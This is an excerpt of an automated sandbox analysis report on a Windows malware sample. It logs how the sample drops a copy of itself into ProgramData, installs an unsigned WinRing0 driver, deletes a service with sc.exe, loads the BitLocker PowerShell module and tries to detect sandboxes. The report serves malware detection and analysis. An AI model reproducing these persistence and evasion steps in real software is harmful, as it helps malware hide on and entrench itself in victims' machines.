              Source: C:\Windows\System32\wusa.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: licensemanagersvc.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: licensemanager.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: clipc.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
              Source: WWhhc3A0rs.exeStatic PE information: Image base 0x140000000 > 0x60000000
              Source: WWhhc3A0rs.exeStatic file information: File size 2729064 > 1048576
              Source: WWhhc3A0rs.exeStatic PE information: Raw size of .data is bigger than: 0x100000 < 0x27c800
              Source: WWhhc3A0rs.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
              Source: Binary string: d:\hotproject\winring0\source\dll\sys\lib\amd64\WinRing0.pdb source: lwmyuxxpdkdz.exe, 00000018.00000003.2185438730.000001CDABBB0000.00000004.00000001.00020000.00000000.sdmp, uoqzkgppgdee.sys.24.dr
              Source: WWhhc3A0rs.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
              Source: WWhhc3A0rs.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
              Source: WWhhc3A0rs.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
              Source: WWhhc3A0rs.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
              Source: WWhhc3A0rs.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
              Source: WWhhc3A0rs.exeStatic PE information: section name: .00cfg
              Source: lwmyuxxpdkdz.exe.0.drStatic PE information: section name: .00cfg
              Source: C:\Users\user\Desktop\WWhhc3A0rs.exeCode function: 0_2_00007FF71EB11394 push qword ptr [00007FF71EB1B004h]; ret 0_2_00007FF71EB11403
              Source: C:\ProgramData\xjnogmzwawzj\lwmyuxxpdkdz.exeCode function: 24_2_00007FF701161394 push qword ptr [00007FF70116B004h]; ret 24_2_00007FF701161403
              Source: C:\Windows\System32\conhost.exeCode function: 35_2_0000000140001394 push qword ptr [0000000140009004h]; ret 35_2_0000000140001403

              Persistence and Installation Behavior

              barindex
              Sample is not signed and drops a device driver
              Source: C:\ProgramData\xjnogmzwawzj\lwmyuxxpdkdz.exeFile created: C:\Windows\TEMP\uoqzkgppgdee.sysJump to behavior
              Source: C:\ProgramData\xjnogmzwawzj\lwmyuxxpdkdz.exeFile created: C:\Windows\Temp\uoqzkgppgdee.sysJump to dropped file
              Source: C:\Users\user\Desktop\WWhhc3A0rs.exeFile created: C:\ProgramData\xjnogmzwawzj\lwmyuxxpdkdz.exeJump to dropped file
              Source: C:\Users\user\Desktop\WWhhc3A0rs.exeFile created: C:\ProgramData\xjnogmzwawzj\lwmyuxxpdkdz.exeJump to dropped file
              Source: C:\ProgramData\xjnogmzwawzj\lwmyuxxpdkdz.exeFile created: C:\Windows\Temp\uoqzkgppgdee.sysJump to dropped file
              Source: C:\Users\user\Desktop\WWhhc3A0rs.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe delete "VKWMZEFB"

              Hooking and other Techniques for Hiding and Protection

              barindex
              Loading BitLocker PowerShell Module
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\conhost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\conhost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

              Malware Analysis System Evasion

              barindex
              Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
